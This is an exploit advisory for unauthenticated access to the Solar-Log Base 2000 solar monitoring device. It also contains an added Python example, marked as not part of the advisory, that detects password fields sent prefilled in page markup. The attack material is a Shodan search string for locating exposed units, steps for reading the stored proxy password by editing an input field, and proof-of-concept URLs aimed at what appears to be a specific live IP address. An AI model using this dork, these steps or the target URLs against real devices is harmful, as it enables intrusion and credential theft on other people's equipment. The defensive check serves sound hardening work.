# Exploit Title: Solar-Log Base 2000 - Broken Access Control
# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP"" "http.favicon.hash:-1334408578 "655744600""
# Date: 4/21/2024
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: https://www.solar-log.com/en/
# Version: Solar-Log Base 2000
# Tested on: Windows/Linux
# 1. Description:
# An issue was discovered in Solar-Log Base 2000.
# An attacker can use Shodan dorks to find the devices and then open the Configuration tab without authentication.
# In this Configuration tab, the attacker can upload any file they want.
# The attacker can open the path #ilang=EN&b=c_network_proxy to find the proxy settings together with the proxy password. The password can be read in clear text by using Inspect Element and clicking on the password field.
# Change the type value of this input to clear:
<input type="password" id="i_prxpass" name="434" class="field SDSLF1">
<input type="clear" id="i_prxpass" name="434" class="field SDSLF1">
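# Added example (not part of the original advisory and not Solar-Log code): the weak pattern described above next to a hardened one, plus a check that flags password inputs shipped with a prefilled value.
# Assumptions: the stored password reaches the browser in the field's value attribute; only the field id i_prxpass comes from the page, while the function names, config keys and sample values are constructed.

```python
from html import escape
from html.parser import HTMLParser

# Constructed sample configuration (not taken from any device).
CONFIG = {"proxy_host": "proxy.example.internal", "proxy_pass": "S3cret-constructed"}


def render_proxy_form_weak(cfg):
    """Weak: the stored secret is sent to the browser; type="password" only masks it."""
    return ('<input type="password" id="i_prxpass" value="%s">'
            % escape(cfg["proxy_pass"], quote=True))


def render_proxy_form_hardened(cfg, session_authenticated):
    """Hardened: reject unauthenticated callers and never echo the secret back."""
    if not session_authenticated:
        return None  # the caller should answer 401/403 instead of rendering
    state = "set" if cfg.get("proxy_pass") else "unset"
    return ('<input type="password" id="i_prxpass" value="" '
            'placeholder="(%s, enter a new value to change)">' % state)


class _PrefilledSecretFinder(HTMLParser):
    """Collects password inputs that carry a non-empty value attribute."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        is_password = (a.get("type") or "").lower() == "password"
        if tag == "input" and is_password and a.get("value"):
            self.hits.append(a.get("id") or a.get("name") or "?")


def prefilled_password_fields(html):
    """Return ids of password fields whose secret is present in the markup."""
    finder = _PrefilledSecretFinder()
    finder.feed(html)
    return finder.hits


if __name__ == "__main__":
    print(prefilled_password_fields(render_proxy_form_weak(CONFIG)))
    print(prefilled_password_fields(render_proxy_form_hardened(CONFIG, True)))
```

# The check only sees values present in the served markup; a value assigned by script after load has to be reviewed in the response data the page fetches.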
# 2. Proof of Concept (PoC):
http://46.44.227.172:84/#ilang=EN&b=c_network_proxy
http://46.44.227.172:84/#ilang=EN&b=c_data_initial